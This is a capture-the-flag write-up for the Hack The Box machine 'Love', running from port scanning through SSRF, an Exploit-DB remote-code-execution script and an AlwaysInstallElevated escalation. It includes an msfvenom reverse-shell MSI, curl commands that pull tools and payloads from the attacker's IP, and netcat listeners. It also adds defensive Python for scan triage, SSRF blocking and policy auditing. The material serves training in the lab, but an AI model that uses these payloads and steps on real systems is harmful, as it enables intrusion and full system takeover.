HTB Love

$ nmap -A -p- 10.10.10.239 -T4

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 05:02 EDT
Nmap scan report for 10.10.10.239
Host is up (0.041s latency).
Not shown: 65516 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '10.10.14.7' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-07-27T09:27:36+00:00; +21m33s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=7/27%Time=60FFCBCE%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.7'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h06m33s, deviation: 3h30m01s, median: 21m32s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-27T02:27:23-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-27T09:27:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.62 seconds

Open ports:

  • 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
  • 135/tcp open msrpc Microsoft Windows RPC
  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
    • ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
  • 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
  • 3306/tcp open mysql?
  • 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
  • 5040/tcp open unknown
  • 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 49664/tcp open msrpc Microsoft Windows RPC
  • 49665/tcp open msrpc Microsoft Windows RPC
  • 49666/tcp open msrpc Microsoft Windows RPC
  • 49667/tcp open msrpc Microsoft Windows RPC
  • 49668/tcp open msrpc Microsoft Windows RPC
  • 49669/tcp open msrpc Microsoft Windows RPC
  • 49670/tcp open msrpc Microsoft Windows RPC
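The port list above is extracted from the scan by hand. As an added example (not part of the original write-up), the script below parses normal-format `nmap -A` output and flags the findings a reviewer would want to see first: the session cookie set without HttpOnly, the hostname disclosed by the certificate on 443 (the same name that is added to the hosts file later), the database and WinRM ports reachable from the scanner, and the SMB signing state. The sample text is a constructed, trimmed copy of the scan output on this page.

```python
"""Triage helper for normal-format nmap -A output (added example)."""
import re
from dataclasses import dataclass, field

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
CN_RE = re.compile(r"commonName=([^/\s]+)")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)   # NSE output lines for this port


def parse_nmap(text):
    """Parse the port table of normal-format nmap output into Port objects."""
    ports, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = Port(int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5).strip())
            ports.append(current)
        elif line.startswith("|") and current is not None:
            current.scripts.append(line.lstrip("|_ ").rstrip())
        elif not line.strip() or line.startswith("Host script"):
            current = None   # host-level script output is not tied to a port
    return ports


def cert_hostnames(ports):
    """Hostnames disclosed by TLS certificate subjects (candidates for /etc/hosts)."""
    names = set()
    for p in ports:
        names.update(CN_RE.findall(" ".join(p.scripts)))
    return sorted(names)


def triage(ports, text):
    """Flag findings worth attention first; returns a list of strings."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        joined = " ".join(p.scripts)
        if "httponly flag not set" in joined:
            findings.append(f"{p.number}/{p.proto}: session cookie set without HttpOnly")
        for cn in CN_RE.findall(joined):
            findings.append(f"{p.number}/{p.proto}: certificate discloses hostname {cn}")
        if p.number == 3306:
            findings.append(f"{p.number}/{p.proto}: database port reachable from the scanner")
        if p.number in (5985, 5986):
            findings.append(f"{p.number}/{p.proto}: WinRM listener reachable from the scanner")
    # SMB signing state comes from host-level scripts, so check the raw text
    if "message_signing: disabled" in text:
        findings.append("445/tcp: SMB1 message signing disabled")
    if "Message signing enabled but not required" in text:
        findings.append("445/tcp: SMB2 message signing not required")
    return findings


# Constructed sample: a trimmed copy of the scan output shown on this page.
SAMPLE = """\
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Voting System using PHP
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

if __name__ == "__main__":
    ports = parse_nmap(SAMPLE)
    print(f"{len(ports)} ports parsed; certificate hostnames: {cert_hostnames(ports)}")
    for finding in triage(ports, SAMPLE):
        print(" -", finding)
```

Run it against a saved `nmap -oN` file instead of `SAMPLE` to get the same summary for any host; the port-number checks are deliberately narrow so that the script reports only what the scan itself shows.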

http://10.10.10.239

$ whatweb 10.10.10.239

http://10.10.10.239 [200 OK] Apache[2.4.46], Bootstrap, Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27], IP[10.10.10.239], JQuery, OpenSSL[1.1.1j], PHP[7.3.27], PasswordField[password], Script, Title[Voting System using PHP], X-Powered-By[PHP/7.3.27], X-UA-Compatible[IE=edge]

Taking into account what we found in the port scan:

commonName=staging.love.htb

We can add those names to the hosts file:

$ sudo nano /etc/hosts

10.10.10.239    love.htb
10.10.10.239    staging.love.htb

http://staging.love.htb/

http://staging.love.htb/beta.php

Given http://localhost as input, this page appears to fetch the URL server-side, so the request is made from within the network.

So, since port 5000 is blocked from the outside, we may be able to reach it through this page.
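What makes this page useful to an attacker is that it fetches whatever URL it is given, including loopback addresses and internal-only ports. As an added example (not code from the target application or the write-up), the guard below shows the server-side check that would have closed that path: it resolves the hostname itself, refuses any address that is not globally routable (loopback, RFC 1918, link-local and similar), and only permits the ports a legitimate fetch needs. The `FAKE_DNS` table and `fake_resolve` are constructed so the example runs offline; in production the default `socket.gethostbyname` resolver applies.

```python
"""Destination guard for a server-side URL fetch (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


class FetchRefused(ValueError):
    """Raised when a URL must not be fetched from the server."""


def check_destination(url, resolve=socket.gethostbyname):
    """Return (host, ip, port) for a URL that is safe to fetch, else raise FetchRefused.

    `resolve` maps a hostname to an address string; the default uses real DNS.
    The returned ip is what the caller must connect to (connect by IP, send the
    Host header separately), otherwise a second lookup could return a different
    address than the one that was checked.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise FetchRefused(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise FetchRefused("no host in URL")
    if parts.username or parts.password:
        raise FetchRefused("credentials in URL are not allowed")
    try:
        port = parts.port
    except ValueError as exc:
        raise FetchRefused("malformed port") from exc
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise FetchRefused(f"port not allowed: {port}")
    try:
        ip = ipaddress.ip_address(parts.hostname)      # literal address, no lookup needed
    except ValueError:
        try:
            ip = ipaddress.ip_address(resolve(parts.hostname))
        except (socket.gaierror, ValueError) as exc:
            raise FetchRefused(f"cannot resolve {parts.hostname!r}") from exc
    # is_global is False for loopback, private, link-local, CGNAT and reserved ranges
    if not ip.is_global:
        raise FetchRefused(f"{parts.hostname} resolves to non-public address {ip}")
    return parts.hostname, str(ip), port


def is_allowed(url, resolve=socket.gethostbyname):
    """Boolean wrapper around check_destination."""
    try:
        check_destination(url, resolve)
        return True
    except FetchRefused:
        return False


# Constructed resolver table so the example runs without network access.
FAKE_DNS = {
    "localhost": "127.0.0.1",
    "staging.love.htb": "10.10.10.239",
    "example.com": "93.184.216.34",
}


def fake_resolve(host):
    """Stand-in for socket.gethostbyname backed by FAKE_DNS (constructed)."""
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(f"no constructed entry for {host!r}")


if __name__ == "__main__":
    for candidate in ("http://example.com/", "http://localhost:5000/",
                      "http://staging.love.htb/", "http://127.0.0.1/",
                      "ftp://example.com/", "http://nonexistent.invalid/"):
        print(f"{candidate:35} allowed={is_allowed(candidate, fake_resolve)}")
```

A port allow-list on its own would not have been enough here: the same host also listens on 443 and 80, so the address check is what keeps loopback and the 10.10.10.0/24 range out of reach. Redirects need the same check applied to every hop, which means disabling automatic redirect following in the HTTP client and re-validating each Location header.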

We’ve discovered admin credentials.

Using them on http://love.htb/admin we get:

https://www.exploit-db.com/exploits/49445

$ python 49445.py

Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully

$ sudo nc -lnvp 8888

[sudo] password for kali: 
listening on [any] 8888 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.239] 58218
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>

C:\Users>dir

dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users

07/27/2021  06:02 AM    <DIR>          .
07/27/2021  06:02 AM    <DIR>          ..
04/12/2021  03:00 PM    <DIR>          Administrator
07/27/2021  06:02 AM    <DIR>          backdoor
04/21/2021  07:01 AM    <DIR>          Phoebe
07/27/2021  06:03 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,967,598,592 bytes free

C:\Users>whoami

whoami
love\phoebe

C:\Users\Phoebe>cd Desktop
C:\Users\Phoebe\Desktop>dir

dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users\Phoebe\Desktop

04/13/2021  03:20 AM    <DIR>          .
04/13/2021  03:20 AM    <DIR>          ..
07/26/2021  11:35 PM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,967,586,304 bytes free

C:\Users\Phoebe\Desktop>type user.txt

2a3eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

C:\Users\Phoebe>curl http://10.10.14.7:8000/winPEAS.exe --output winPEAS.exe
C:\Users\Phoebe>winPEAS.exe

Running WinPEAS gives us a clue.

Since all installations are performed with elevated privileges, we can use msfvenom to build an MSI installer that returns a reverse shell.
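The condition being abused here is the Windows Installer policy that makes every MSI install run with SYSTEM privileges regardless of who launched it. As an added example (not code from the write-up or from winPEAS), the audit below checks for that policy the way an administrator would verify remediation: it parses `reg query` output for the AlwaysInstallElevated value under the Installer policy key in both HKLM and HKCU, and reports the policy as effective only when both are set to 1, which is the condition Windows requires for it to apply. `query_live` reads the registry directly when run on Windows and returns None elsewhere. The two `reg query` samples are constructed.

```python
"""Audit for the Windows Installer AlwaysInstallElevated policy (added example)."""
import platform
import re

INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"
# reg query prints values as: <indent><name><spaces><REG_TYPE><spaces><data>
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")


def parse_reg_query(text):
    """Map value names to (type, raw data) from `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3))
    return values


def dword_is_one(values, name):
    """True only if `name` exists, is REG_DWORD and equals 1 (reg query prints 0x1)."""
    if name not in values:
        return False
    vtype, data = values[name]
    if vtype != "REG_DWORD":
        return False
    try:
        return int(data, 0) == 1     # base 0 accepts both '0x1' and '1'
    except ValueError:
        return False


def always_install_elevated(hklm_text, hkcu_text):
    """Effective policy: the value must be 1 under BOTH hives."""
    return (dword_is_one(parse_reg_query(hklm_text), VALUE_NAME)
            and dword_is_one(parse_reg_query(hkcu_text), VALUE_NAME))


def query_live():
    """On Windows, read both hives with winreg; on other platforms return None."""
    if platform.system() != "Windows":
        return None
    import winreg   # only importable on Windows
    states = []
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, INSTALLER_KEY) as key:
                data, vtype = winreg.QueryValueEx(key, VALUE_NAME)
                states.append(vtype == winreg.REG_DWORD and data == 1)
        except OSError:            # key or value absent: policy not set in this hive
            states.append(False)
    return all(states)


# Constructed samples of `reg query` output for the two hives.
HKLM_SET = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_SET = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_UNSET = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""

if __name__ == "__main__":
    print("both hives set   ->", always_install_elevated(HKLM_SET, HKCU_SET))
    print("HKCU cleared     ->", always_install_elevated(HKLM_SET, HKCU_UNSET))
    print("live registry    ->", query_live())
```

Remediation is to leave the value absent or 0 in both hives; clearing either one is enough to stop standard users from obtaining SYSTEM through an arbitrary MSI, and the audit above reports False as soon as one side is cleared.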

$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.7 lport=9999 --format msi > file.msi

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes

c:\Users\Phoebe>curl http://10.10.14.7:8000/file.msi -o file.msi

curl http://10.10.14.7:8000/file.msi -o file.msi
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  156k  100  156k    0     0   156k      0  0:00:01 --:--:--  0:00:01  768k

c:\Users\Phoebe>msiexec /quiet /qn /i file.msi

msiexec /quiet /qn /i file.msi 

$ sudo nc -lvnp 9999

listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.239] 59789
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>

C:\WINDOWS\system32>whoami

whoami
nt authority\system

c:\Users\Administrator\Desktop>dir

dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of c:\Users\Administrator\Desktop

04/13/2021  03:20 AM    <DIR>          .
04/13/2021  03:20 AM    <DIR>          ..
07/28/2021  07:03 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,070,354,944 bytes free

c:\Users\Administrator\Desktop>type root.txt

710fXXXXXXXXXXXXXXXXXXXXXXXXXXXX
